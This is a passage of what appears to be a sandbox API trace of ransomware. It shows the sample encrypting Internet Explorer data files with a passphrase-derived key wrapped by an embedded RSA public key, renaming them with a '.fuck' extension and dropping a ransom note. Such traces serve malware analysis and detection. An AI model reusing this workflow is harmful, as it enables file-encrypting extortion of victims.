KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.349] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0267.349] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x298a040) returned 1 [0267.349] CryptImportPublicKeyInfo (in: hCryptProv=0x298a040, dwCertEncodingType=0x1, pInfo=0x2eb08f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0920*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0928*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f2c0) returned 1 [0267.349] CryptEncrypt (in: hKey=0x2e7f2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0267.350] CryptEncrypt (in: hKey=0x2e7f2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e172e8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e172e8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0267.350] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2e172e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e172e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0267.351] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.388] CryptEncrypt (in: hKey=0x2e7f200, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.460] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x2a, lpOverlapped=0x0) returned 1 [0267.461] CryptEncrypt (in: hKey=0x2e7f200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x2a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x30) returned 1 [0267.461] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x30, lpOverlapped=0x0) returned 1 [0267.461] CloseHandle (hObject=0x5d48) returned 1 [0267.461] CloseHandle (hObject=0x5d3c) returned 1 [0267.461] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log"), bFailIfExists=0) returned 1 [0267.464] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log", dwFileAttributes=0x0) returned 1 [0267.465] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log.gsg")) returned 1 [0267.466] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log.fuck")) returned 1 [0267.468] CryptDestroyHash (hHash=0x2e7eb80) returned 1 [0267.468] CryptDestroyKey (hKey=0x2e7f200) returned 1 [0267.468] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0267.468] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.468] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0267.468] GetLastError () returned 0x0 [0267.469] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log")) returned 0x20 [0267.469] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log", dwFileAttributes=0x80) returned 1 [0267.469] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.470] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.471] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.gsg", dwFileAttributes=0x2) returned 1 [0267.471] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0267.474] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0267.474] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.474] CryptHashData (hHash=0x2e7eb80, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.474] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7eb80, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7f800) returned 1 [0267.474] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.474] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0267.474] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e796a8) returned 1 [0267.475] CryptImportPublicKeyInfo (in: hCryptProv=0x2e796a8, dwCertEncodingType=0x1, pInfo=0x2eb1860*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1890*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1898*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f700) returned 1 [0267.475] CryptEncrypt (in: hKey=0x2e7f700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0267.475] CryptEncrypt (in: hKey=0x2e7f700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e135d0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e135d0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0267.475] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e135d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e135d0*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0267.476] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.493] CryptEncrypt (in: hKey=0x2e7f800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.503] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x194, lpOverlapped=0x0) returned 1 [0267.503] CryptEncrypt (in: hKey=0x2e7f800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x194, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x1a0) returned 1 [0267.503] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x1a0, lpOverlapped=0x0) returned 1 [0267.503] CloseHandle (hObject=0x5d3c) returned 1 [0267.503] CloseHandle (hObject=0x5d48) returned 1 [0267.504] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log"), bFailIfExists=0) returned 1 [0267.507] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log", dwFileAttributes=0x0) returned 1 [0267.508] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log.gsg")) returned 1 [0267.509] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log.fuck")) returned 1 [0267.511] CryptDestroyHash (hHash=0x2e7eb80) returned 1 [0267.511] CryptDestroyKey (hKey=0x2e7f800) returned 1 [0267.511] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0267.511] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.511] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.512] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.512] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.512] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0267.513] GetLastError () returned 0x0 [0267.513] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml")) returned 0x20 [0267.513] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml", dwFileAttributes=0x80) returned 1 [0267.513] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.514] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.516] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.gsg", dwFileAttributes=0x2) returned 1 [0267.516] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2989270) returned 1 [0267.519] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0267.519] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.519] CryptHashData (hHash=0x2e7ec80, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.519] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2e7ec80, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7f880) returned 1 [0267.520] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.520] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0267.520] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2e7a500) returned 1 [0267.520] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a500, dwCertEncodingType=0x1, pInfo=0x2eb00d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0100*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0108*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f100) returned 1 [0267.520] CryptEncrypt (in: hKey=0x2e7f100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0267.521] CryptEncrypt (in: hKey=0x2e7f100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25130*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25130*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0267.521] WriteFile (in: hFile=0x5d44, lpBuffer=0x2f25130*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25130*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0267.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.542] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.542] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.544] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.544] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.544] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.544] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.544] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.544] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.544] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x190, lpOverlapped=0x0) returned 1 [0267.544] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x190, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x1a0) returned 1 [0267.544] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x1a0, lpOverlapped=0x0) returned 1 [0267.545] CloseHandle (hObject=0x5d3c) returned 1 [0267.545] CloseHandle (hObject=0x5d44) returned 1 [0267.545] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml"), bFailIfExists=0) returned 1 [0267.551] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml", dwFileAttributes=0x0) returned 1 [0267.558] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml.gsg")) returned 1 [0267.560] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml.fuck")) returned 1 [0267.563] CryptDestroyHash (hHash=0x2e7ec80) returned 1 [0267.563] CryptDestroyKey (hKey=0x2e7f880) returned 1 [0267.563] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0267.563] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.563] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.563] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\readme_back_files.htm")) returned 0xffffffff [0267.563] AreFileApisANSI () returned 1 [0267.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0267.563] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.564] GetFileType (hFile=0x5d48) returned 0x1 [0267.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.566] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.566] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.567] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.567] 